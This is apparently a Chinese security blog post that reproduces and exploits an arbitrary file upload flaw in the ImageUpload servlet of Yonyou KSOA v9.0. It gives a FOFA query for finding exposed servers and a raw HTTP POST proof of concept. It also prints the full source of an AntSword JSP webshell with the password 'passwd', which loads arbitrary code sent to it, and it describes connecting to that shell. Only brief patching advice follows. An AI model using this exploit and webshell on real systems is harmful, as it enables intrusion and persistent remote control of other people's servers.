用友时空KSOA ImageUpload任意文件上传漏洞复现+利用

1、产品简介

  用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。

2、漏洞概述

   用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。 

3、影响范围

  用友时空企业信息融通平台KSOA v9.0

4、复现环境

  FOFA:app="用友-时空KSOA"

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第1张图片

5、漏洞复现

burp抓取首页包发送Repeater模块进行复现 

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第2张图片

 POC

POST /servlet/com.sksoft.bill.ImageUpload?filename=[上传的文件名]&filepath=/ HTTP/1.1
Host: your-ip

[文件内容]

 用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第3张图片

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第4张图片

复现成功

6、漏洞利用 

页面是java写的,直接尝试上传蚁剑jsp一句话木马,密码:passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第5张图片

验证是否可解析

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第6张图片

没问题,打开蚁剑尝试连接(测试完记得把后门删除)

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用_第7张图片

 7、修复建议

      升级至安全版本或打补丁

      减少互联网暴露面,限制上传的文件类型,增加上传黑白名单约束条件等。

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)